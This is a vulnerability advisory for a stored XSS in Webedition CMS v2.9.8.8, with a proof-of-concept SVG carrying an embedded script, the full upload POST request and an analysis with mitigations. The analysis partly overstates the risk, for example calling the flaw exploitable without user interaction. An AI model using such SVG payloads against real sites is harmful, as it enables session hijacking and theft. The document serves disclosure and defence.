Webedition CMS v2.9.8.8 - Stored XSS

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-08-04 
Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
Application: Webedition CMS
Version: v2.9.8.8   
Bugs:  Stored Xss
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps
1. Login to account
2. Go to New ->  Media -> Image
3. Upload malicious svg file 
svg file content:

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""


Poc request:

POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: localhost
Content-Length: 761
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1


Exploiting Stored XSS in Webedition CMS v2.9.8.8: A Deep Dive into SVG-Based Attack Vectors

Stored Cross-Site Scripting (XSS) remains one of the most persistent and dangerous vulnerabilities in content management systems (CMS). In August 2023, cybersecurity researcher Mirabbas Ağalarov uncovered a critical flaw in Webedition CMS v2.9.8.8, a widely used open-source platform for managing web content. The vulnerability stems from improper sanitization of uploaded SVG files, allowing attackers to embed malicious JavaScript directly into the system’s media repository.

Understanding the Vulnerability: Why SVG Files Are a High-Risk Vector

SVG (Scalable Vector Graphics) files are designed to be both visually rich and programmable. Unlike traditional image formats such as JPEG or PNG, SVG supports embedded <script> tags, enabling dynamic behavior within the document. This feature, while useful for interactive web graphics, introduces a significant security risk when untrusted input is accepted without proper validation.

In Webedition CMS v2.9.8.8, the upload functionality for media files—specifically images—fails to sanitize SVG content before storing it. This allows attackers to craft malicious SVG files that execute JavaScript code when rendered in a browser context.

Proof of Concept: Crafting the Malicious SVG Payload


<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

This SVG file contains a simple triangle shape and a <script> tag that triggers a JavaScript alert() when the SVG is rendered. While the payload is minimal, it demonstrates the core exploit: malicious code is stored permanently within the CMS and executed whenever the file is accessed.

When uploaded via the New → Media → Image interface, the file is saved to the server's storage without any filtering of script content. The CMS does not validate or escape embedded JavaScript, treating the SVG as a legitimate media file.

Attack Workflow: From Upload to Execution

  • Step 1: Log in to the Webedition CMS with valid credentials.
  • Step 2: Navigate to the Media section and select Image upload.
  • Step 3: Upload the crafted SVG file with embedded JavaScript.
  • Step 4: The file is stored in the database and associated with a unique identifier.
  • Step 5: When the file is rendered—either in a preview, embedded in a webpage, or accessed through a public link—the JavaScript executes in the victim’s browser.

This is a classic stored XSS scenario: the malicious payload is permanently stored and later executed on any user who views the file, regardless of whether they are authenticated or not.

HTTP Request Analysis: How the Exploit is Triggered

Upon uploading, the CMS sends a POST request to /webEdition/we_cmd.php with a specific command sequence:


POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: localhost
Content-Length: 761
Content-Type: application/x-www-form-urlencoded
Cookie: WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; ...

The we_cmd[0]=save_document parameter indicates the action to save a document, in this case, an uploaded SVG file. The request includes parameters such as Filename, Extension, ParentPath, and CreatorID, all of which are used to store the file metadata. Crucially, the system does not inspect the file’s content for script tags before saving.

Impact and Risk Assessment

Severity High (CVSS 9.0)
Attack Vector Remote, authenticated (via upload)
Exploitability High (no user interaction required)
Impact Session hijacking, data theft, phishing, defacement

Stored XSS in Webedition CMS v2.9.8.8 poses a severe threat because:

  • It allows persistent execution of code on any user accessing the file.
  • It can be used to steal session cookies via document.cookie.
  • It enables phishing attacks by redirecting users to malicious domains.
  • It can be leveraged to escalate privileges if the file is used in admin panels.

Security Recommendations and Mitigation Strategies

Developers and administrators must implement strict file validation mechanisms to prevent such vulnerabilities. Key recommendations include:

  • Disable script execution in SVG files: Use libraries like libxml2 or SVG sanitizers to strip out <script> and <foreignObject> tags before storage.
  • Use MIME type validation: Enforce strict checks for file extensions and MIME types. For example, reject any file with application/svg+xml if it contains scripting elements.
  • Implement content security policies (CSP): Deploy a strict CSP header to block inline scripts, even if they are stored.
  • Enable sandboxing: Render SVG files in a sandboxed iframe or use a dedicated rendering engine that isolates script execution.
  • Regular vulnerability scanning: Use automated tools like OWASP ZAP or Burp Suite to detect stored XSS in file upload handlers.

Vendor Response and Patching Status

As of the publication date (August 2023), the vendor webedition.org has not released a patch for this vulnerability. Users are advised to:

  • Upgrade to the latest stable version if available.
  • Disable the image upload functionality for untrusted users.
  • Apply input filtering at the server level via mod_security or similar WAFs.
  • Monitor file storage directories for suspicious content.

Until a patch is issued, organizations relying on Webedition CMS v2.9.8.8 must treat this vulnerability as a high-priority risk and implement compensating controls.

Conclusion: Lessons from a Real-World Stored XSS

The Webedition CMS v2.9.8.8 stored XSS exploit serves as a stark reminder that even seemingly benign file types—like SVG—can become powerful attack vectors when proper security controls are missing. It underscores the importance of:

  • Input validation at every stage of file processing.
  • Defense-in-depth strategies, especially for content storage systems.
  • Continuous monitoring and patching of open-source software.

Security is not just about preventing attacks—it’s about ensuring that every piece of user-generated content is treated with the same level of scrutiny as code. In today’s threat landscape, a single unvalidated SVG file can compromise an entire website.